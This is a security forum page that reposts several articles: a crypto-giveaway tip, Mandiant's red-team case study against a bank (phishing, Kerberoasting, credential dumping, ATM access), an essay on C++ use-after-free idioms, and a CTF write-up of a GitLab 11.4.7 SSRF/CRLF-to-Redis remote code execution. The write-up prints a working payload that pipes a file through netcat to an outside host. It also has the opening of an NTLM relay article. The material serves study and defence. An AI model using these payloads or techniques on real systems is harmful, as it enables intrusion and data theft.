Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 04/25/19 in all areas

  1. Daca aveti cont pe blockchain si il verificati (cu id) veti primi/ati primit deja niste Stellar (XLM). Daca nu, va puteti face cont aici https://www.blockchain.com/getcrypto si dupa verificare id va crediteaza contul cu ceva sume random. Majoritatea spun ca au primit echivalentul a 20-30 eur. Eu am primit echivalentul a 45 eur. XLM-ul se poate converti apoi in ETH sau BTC (sau altele) pe site-uri gen binance sau alte echivalente. Spor!
    3 points
  2. Finding Weaknesses Before the Attackers Do April 08, 2019 | by Alyssa Rahman, Curtis Antolik M-trends Red Teaming This blog post originally appeared as an article in M-Trends 2019. FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation state attackers across the entire attack lifecycle by blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats. A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team’s detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection: Compromise Active Directory (AD): Gain domain administrator privileges within the client’s Microsoft Windows AD environment. Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality. Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client’s payment management system. Access ATM environment: Identify and access ATMs in a segmented portion of the internal network. Initial Compromise Based on Mandiant’s investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email. While performing Open-source intelligence (OSINT) reconnaissance of the client’s Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client’s login portal (Figure 1). Figure 1: Cloned Outlook Web Portal After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk. Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the “migration,” the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees which could be used to establish a foothold in the client’s internal network. Establishing a Foothold Although the client’s virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a singlefactor bring-your-own-device (BYOD) portal (Figure 2). Figure 2: Single factor mobile device management portal Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device. To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client’s VPN certificate (Fig. 13), which was automatically imported to the Cisco AnyConnect app—also installed on the phone. Figure 3: Setting up mobile device management After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client’s VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client’s internal network. Escalating Privileges Once connected to the internal network, the red team used the Windows “runas” command to launch PowerShell as CUSTOMER\user0 and perform a “Kerberoast” attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts’ ticketgranting service (TGS) tickets and brute-force accounts with weak passwords. To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). The typical Kerberoast attack would then request a TGS for the SPN of the associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be identified as suspicious. Using a keyword search for terms such as “Admin”, “SVC” and “SQL,” the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server which successfully brute-forced the passwords of 4 out of 18 accounts within 2.5 hours. The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\ {ComputerName}\C$. The red team also executed commands on the system using PowerShell Remoting to gain information about logged on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent which had the capability to perform in-memory detections that were likely to identify and alert on the execution of suspicious command line arguments and parent/ child process heuristics associated with credential theft. To avoid detection, the red team created LSASS process memory dumps by using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz. The red team performed this process on 10 unique systems identified to potentially have active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group. With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer’s domain. This privileged account was then used to focus on accessing several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets. Accessing High-Value Objectives For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target. Targeting Financial Applications The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application. The red team reviewed the files and documentation on financial application web servers and found an authentication og indicating the following users accessed the financial application: CUSTOMER\user1 CUSTOMER\user2 CUSTOMER\user3 CUSTOMER\user4 The red team navigated to the financial application’s web interface (Figure 4) and found that authentication required an “RSA passcode,” clearly indicating access required an MFA token. Figure 4: Financial application login portal Bypassing Multi-Factor Authentication The red team targeted the client’s RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers. Figure 5: RSA migration logs from \\ CUSTOMER-FS01\ Software Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\ data folders of the RSA servers, finding CUSTOMER\ CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\ CUSTOMER_ADMIN10 as a potential RSA administrator. Figure 6: Directory listing output By reviewing user details, the red team identified the CUSTOMER\CUSTOMER_ADMIN10 account was actually the privileged account for the corresponding standard user account CUSTOMER\user103. The red team then used PowerView, an open source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently logged in (Figure 7). Figure 7: Running the PowerView Invoke-UserHunter command The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8). Figure 8: Mimikatz output The red team used the credential for CUSTOMER\user103 to login, without MFA, to the web front-end of the RSA security console with administrative rights (Figure 9). Figure 9: RSA console Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user’s RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstation. While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes. The red team set a malicious Outlook homepage for the financial application user CUSTOMER\user1 through MAPI over HTTP using the Ruler11 utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch. Once CUSTOMER\user1 had re-launched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the target user used KeePass, a common password vaulting solution. The red team performed an attack against KeePass to retrieve the contents of the file without having the master password by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass a comma-separated values (CSV) file was created with all passwords in the KeePass database, and the red team was able to retrieve the export from the user’s roaming profile. Figure 10: Malicious configuration file One of the entries in the resulting CSV file was login credentials for the financial application, which included not only the application password, but also the user’s RSA SecurID PIN. With this information the red team possessed all the credentials needed to access the financial application. The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\ user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact to the user’s ability to conduct business. Figure 11: Emergency access token The red team then successfully authenticated to the financial application with the emergency access token (Figure 12). Figure 12: Financial application accessed with emergency access token Accessing ATMs The red team’s final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_ Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory. After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client’s internal Citrix portal to access the employee’s desktop. The red team reviewed the administrator’s documentation and determined the client’s ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for “ATM Management.” While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01. The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team’s CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA pin. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATM machines (Figure 13). Figure 13: Executing commands on ATMs as SYSTEM Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation Multi-Factor Authentication Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications being accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications. Password Policy During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute forced. FireEye recommends that customers enforce strong password practices for all accounts. Customers should enforce a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users. Account Segmentation Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the “principle of least-privilege” when provisioning accounts. Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts even if a single employee needs one of each. Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account. Conclusion As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client’s environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client’s internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client’s MFA, service account password policy and account segmentation. Sursa: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html
    1 point
  3. 1 point
  4. Modern C++ Won't Save Us 2019-04-21 by alex_gaynor I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"1 or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects. I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities. Hide the reference use-after-free The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities: #include <iostream> #include <string> #include <string_view> int main() { std::string s = "Hellooooooooooooooo "; std::string_view sv = s + "World\n"; std::cout << sv; } What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type. Another fun variant involves using C++'s lambda support to hide a reference: #include <memory> #include <iostream> #include <functional> std::function<int(void)> f(std::shared_ptr<int> x) { return [&]() { return *x; }; } int main() { std::function<int(void)> y(nullptr); { std::shared_ptr<int> x(std::make_shared<int>(4)); y = f(x); } std::cout << y() << std::endl; } Here the [&] in f causes the lambda to capture values by reference. Then in main x goes out of scope, destroying the last reference to the data, and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increment and decrements on the reference count. std::optional<T> dereference std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raises an exception if the the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, however they do not check if the optional actually contains a value or not. The following code for example, simply returns an uninitialized value: #include <optional> int f() { std::optional<int> x(std::nullopt); return *x; } If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr. And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well: #include <optional> #include <memory> std::unique_ptr<int> f() { std::optional<std::unique_ptr<int>> x(std::nullopt); return std::move(*x); } std::span<T> indexing std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy. Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span. Conclusion Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span. My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe) is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++). There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right. [1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However I think it's worth acknowledging that given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements. Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was a engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC. Sursa: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
    1 point
  5. GitLab 11.4.7 Remote Code Execution 21 Apr 2019 Capture The FlagWeb HackingExploit Walkthrough TL;DR SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol. Video watch on YouTube Introduction At the Real World CTF, we came across an interesting web challenge called flaglab. The description said: "You might need a 0day" there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a google search on the gitlab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and it's just a waste of time... But as it turns out, we were wrong on these assumptions. During a post CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8 and the commit history of the newer version reveals several security patches. One of the bugs was a "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was aactually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge from the knowledge gained so far. Setup Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file. web: image: 'gitlab/gitlab-ce:11.4.7-ce.0' restart: always hostname: 'gitlab.example.com' environment: GITLAB_OMNIBUS_CONFIG: | external_url 'http://gitlab.example.com' redis['bind']='127.0.0.1' redis['port']=6379 gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password') ports: - '5080:80' - '50443:443' - '5022:22' volumes: - './srv/gitlab/config:/etc/gitlab' - './srv/gitlab/logs:/var/log/gitlab' - './srv/gitlab/data:/var/opt/gitlab' - './steg0_initial_root_password:/steg0_initial_root_password' - './flag:/flag:ro' From the above YAML file, the following conclusions can be made: The docker image used is GitLab Community Edition 11.4.7 gitlab-ce:11.4.7-ce.0. Redis server runs on port 6379 and it is listening to localhost. The rails initial_root_password is set using a file called steg0_initial_root_password There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080. Additionally, there are volumes, which mounts the local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag is also copied into the container. You can create these required files and folders using the following commands: # Create required folders for the gitlab logs, data and configs. leave it empty mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs # Create a random password using python python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password # ==OR== # Choose your own password echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password # Create a test flag echo "RWCTF{this_is_flaglab_flag}" > ./flag Now that we have the required files and folders, we can start the docker container using the following command. $ docker-compose up The process of downloading the base image and building the gitlab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version. Now it's time to configure the chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command-line which is a bit handier. /path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list="" I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following. 127.0.0.1 localhost.com Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup! The Bugs As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact, there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced to Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally we also know that the flag file is located in the /(root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks, we also have an XSS, but it's rather not that interesting for us, and finally, we have a CRLF injection (Carriage-Return/Line-Feed) which is basically newline injections. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently, special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks. # SSRF protection Bypass https://[0:0:0:0:0:ffff:127.0.0.1] The other issue was a CRLF vulnerability in Project hooks, scrolling down to test cases you can see it's merely URLs with newlines. Either it's URL encoded, or simply they are just regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came acorss this technique, but I believe it's @Agarri_FR back in 2015, tweeted about this and also there was a blog post by him from 2014. I did come across many bug bug bounty writeups, so everyone who's into web security should know about this. Exploitation Now onto the fun stuff, first, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on the create a new project, I saw multiple ways to import a project and one of them was Repo by URL, which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL. http://127.0.0.1/test/somerepo.git But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed". Now, we can try the bypass using the special IPv6 address. So if we replace the import URL to the following. http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git Before importing using this URL, we need a server to listen on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list out all the running Docker containers to know which one to get a shell on. # get a list of running docker containers $ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS NAMES bd9daf8c07a6 gitlab/gitlab-ce:11.4.7-ce.0 ... ... ... ... We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID. $ docker exec -i -t bd9daf8c07a6 "/bin/bash" Here, bd9daf8c07a6 is the container ID. -i means interaction with /bin/bash. -t means create tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests. root@gitlab:~ apt update && apt install -y netcat Setting up a raw TCP server is simple as the following command. root@gitlab:~ nc -lvp 1234 Here, -l is to tell netcat that we have to "listen". -v is for verbose output. -p is to specift the port number on which the server has to bind on. Now that we have our SSRF testing setup done let's make the same import request to see if we can trigger the SSRF. Additionally, Instead of specifying the URL from the web application in the browser, we can use the Burp Suite's repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there and send the request. As you can see from the above image, we did get the request trapped in our netcat listener, and this confirms that there is SSRF which can talk to internal services, which in our case was the local netcat server on port 1234, which means that we can talk to the internal Redis server running on port 6379(specified in the docker-compose.yml). But what is Redis and how does GitLab use it? Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around. # quick test with redis root@gitlab:~ nc 127.0.0.1 6379 blah - ERR unknown command 'blah' set liveoverflow test +OK asd - ERR unknown command 'asd' get liveoverflow $4 test Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we try to send the HTTP request to Redis? Would Redis execute commands? Let's try. # http request test with redis root@gitlab:~ nc 127.0.0.1 6379 GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1 Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 User-Agent: git/2.18.1 Accept: */* Accept-Encoding: deflate, gzip Pragma: no-cache - Err wrong number of arguments for 'get' command root@gitlab:~ It gives us an error saying that there are wrong a number of arguments for the 'get' command which makes sense because from the earlier example, we know how 'get' command in Redis works. But, then we were dropped back to the shell, however from earlier, we saw that Redis doesn't quit even if there errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 is responsible for the Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue and Redis has implemented a "fix" for this. If the string "Host:" is present to the Redis server as a command, it'll know that this is an HTTP request trying to smuggle some Redis commands and stops the execution by closing the connection. Only if we could get our payload in-between the first line(GET /test...) and the second(Host: ...), we can make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough* Yes, remember the CRLF injection bug we saw in the Security Release and the commit history, we can use that! From the commit history's test cases, we can see that the injection is pretty straight forward. By merely adding newlines or URL encoding them would do the trick for example. http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To http://127.0.0.1:333/ test blah.git However, this didn't work out. Not sure why this doesn't work, but by changing the protocol from http:// to git:// makes it work. # Does work :) git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To git://127.0.0.1:333/ test blah.git Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on into creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability and smuggling one protocol(Redis) in another(git://) and get the Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec As you know, Redis can also be used to background job queues. These jobs are handled by Sidekiq, which is a background tasks processor for ruby. We can look at the list of sidekiq queues to see if there's anything that we can use. ... - [default, 1] - [pages, 1] - [system_hook_push, 1] - [propagate_service_template, 1] - [background_migration, 1] ... There's system_hook_push which can be used to handle the new jobs and it's the same one which is being used in the actual payload. Now to execute code/command, we need a class that would do it for us, think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb. class GitlabShellWorker include ApplicationWorker include Gitlab::ShellAdapter def perform(action, *arg) gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend end end As you can see, this is exactly the class we've been looking for. Now this GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, and in our case, it's the following. open('| COMMAND_TO_BE_EXECUTED').read In the actual payload, we push the queue onto system_hook_push and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag. $ nc -lvp 1234 The final payload looks like the following. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec Some points to note: In the payload above, redis commands need to have a whitespace before it in every line - no clue why. cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener. Added an extra exec command just so that the first one is executed properly and the second one would be concatenated with the next line instead of the first line. This is done so that important part of the payload won't break. The final import URL with the payload looks like this: # No Encoding git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec /ssrf.git # URL encoded git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git Now if you send the "Repo by URL" request with this URL, we get the flag! Conclusion and Takeaways This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing one of the reported bugs was by Chaitin Tech (organizers), it was just a matter of 2-3 hours to solve this challenge. Do proper research before jumping into conclusions. It's all about the mindset. Resources docker-compose.yml Video Explanation LiveOverflow (and PwnFunction) wannabe hacker... Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
    1 point
  6. Playing with Relayed Credentials June 27, 2018 Home Blogs Playing with Relayed Credentials During penetration testing exercises, the ability to make a victim connect to an attacker’s controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers ) by means of a Phishing email or, by means of different techniques with the goal of redirecting traffic (e.g. ARP Poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that involves using victims’ connections in a way that would allow the attacker to impersonate them against a target server of his choice - assuming the underlying authentication protocol used is NT LAN Manager (NTLM). General NTLM Relay Concepts The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001 by Sir Dystic of Cult of The Dead Cow- who only focused on SMB connections – although, he used nice tricks especially when launched from Windows machines where some ports are locked by the kernel. I won’t go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not related to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager Authentication Protocol (defined here). There are two flavors for this attack: Relay Credentials to the victim machine (a.k.a. Credential Reflection): In theory, fixed by 